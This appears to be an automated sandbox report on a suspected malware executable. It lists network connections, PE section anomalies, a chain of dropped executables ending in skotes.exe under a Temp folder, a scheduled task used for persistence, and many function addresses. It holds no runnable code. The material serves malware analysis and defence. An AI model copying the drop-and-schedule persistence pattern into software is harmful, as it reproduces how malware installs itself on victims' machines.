Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49999 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49930

Source: unknown	HTTPS traffic detected: 40.126.53.13:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.199.58.43:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.206.197.17:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.6:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.6:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.223.36.55:443 -> 192.168.2.6:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.28.10:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.206.197.33:443 -> 192.168.2.6:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.6:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49996 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: DGCAAFBFBK.exe.0.dr	Static PE information: section name:
Source: DGCAAFBFBK.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.20.dr	Static PE information: section name:
Source: skotes.exe.20.dr	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C9BB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C9BB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C9BB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C95F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C95F280
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_00B1CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	23_2_00B1CB97

Source: C:\Users\user\Documents\DGCAAFBFBK.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9535A0	0_2_6C9535A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C966C80	0_2_6C966C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9B34A0	0_2_6C9B34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BC4A0	0_2_6C9BC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C97D4D0	0_2_6C97D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9664C0	0_2_6C9664C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C996CF0	0_2_6C996CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C95D4E0	0_2_6C95D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C995C10	0_2_6C995C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9A2C10	0_2_6C9A2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9CAC00	0_2_6C9CAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9C542B	0_2_6C9C542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9C545C	0_2_6C9C545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C965440	0_2_6C965440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C990DD0	0_2_6C990DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9B85F0	0_2_6C9B85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C97ED10	0_2_6C97ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C980512	0_2_6C980512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C96FD00	0_2_6C96FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C975E90	0_2_6C975E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9BE680	0_2_6C9BE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9B4EA0	0_2_6C9B4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C95BEF0	0_2_6C95BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C96FEF0	0_2_6C96FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9C76E3	0_2_6C9C76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C997E10	0_2_6C997E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9A5600	0_2_6C9A5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9B9E30	0_2_6C9B9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C979E50	0_2_6C979E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C993E50	0_2_6C993E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9A2E4E	0_2_6C9A2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C974640	0_2_6C974640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C95C670	0_2_6C95C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9C6E63	0_2_6C9C6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9A77A0	0_2_6C9A77A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C986FF0	0_2_6C986FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C95DFE0	0_2_6C95DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C997710	0_2_6C997710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C969F00	0_2_6C969F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9860A0	0_2_6C9860A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9C50C7	0_2_6C9C50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C97C0E0	0_2_6C97C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9958E0	0_2_6C9958E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C967810	0_2_6C967810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C99B820	0_2_6C99B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9A4820	0_2_6C9A4820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C978850	0_2_6C978850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C97D850	0_2_6C97D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C99F070	0_2_6C99F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C995190	0_2_6C995190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9B2990	0_2_6C9B2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C98D9B0	0_2_6C98D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C95C9A0	0_2_6C95C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C97A940	0_2_6C97A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9AB970	0_2_6C9AB970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9CB170	0_2_6C9CB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C96D960	0_2_6C96D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9CBA90	0_2_6C9CBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C96CAB0	0_2_6C96CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9C2AB0	0_2_6C9C2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9522A0	0_2_6C9522A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C984AA0	0_2_6C984AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C998AC0	0_2_6C998AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C971AF0	0_2_6C971AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C99E2F0	0_2_6C99E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C999A60	0_2_6C999A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C95F380	0_2_6C95F380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9C53C8	0_2_6C9C53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C99D320	0_2_6C99D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C955340	0_2_6C955340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C96C370	0_2_6C96C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C9FECC0	0_2_6C9FECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA5ECD0	0_2_6CA5ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADAC30	0_2_6CADAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC6C00	0_2_6CAC6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA0AC60	0_2_6CA0AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA04DB0	0_2_6CA04DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA96D90	0_2_6CA96D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8CDC0	0_2_6CB8CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB88D20	0_2_6CB88D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CACED70	0_2_6CACED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2AD50	0_2_6CB2AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA86E90	0_2_6CA86E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA0AEC0	0_2_6CA0AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAA0EC0	0_2_6CAA0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAE0E20	0_2_6CAE0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA9EE70	0_2_6CA9EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB48FB0	0_2_6CB48FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA0EFB0	0_2_6CA0EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA00FE0	0_2_6CA00FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CADEFF0	0_2_6CADEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB40F20	0_2_6CB40F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA06F10	0_2_6CA06F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAC2F70	0_2_6CAC2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA6EF40	0_2_6CA6EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB068E0	0_2_6CB068E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA50820	0_2_6CA50820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CA8A820	0_2_6CA8A820
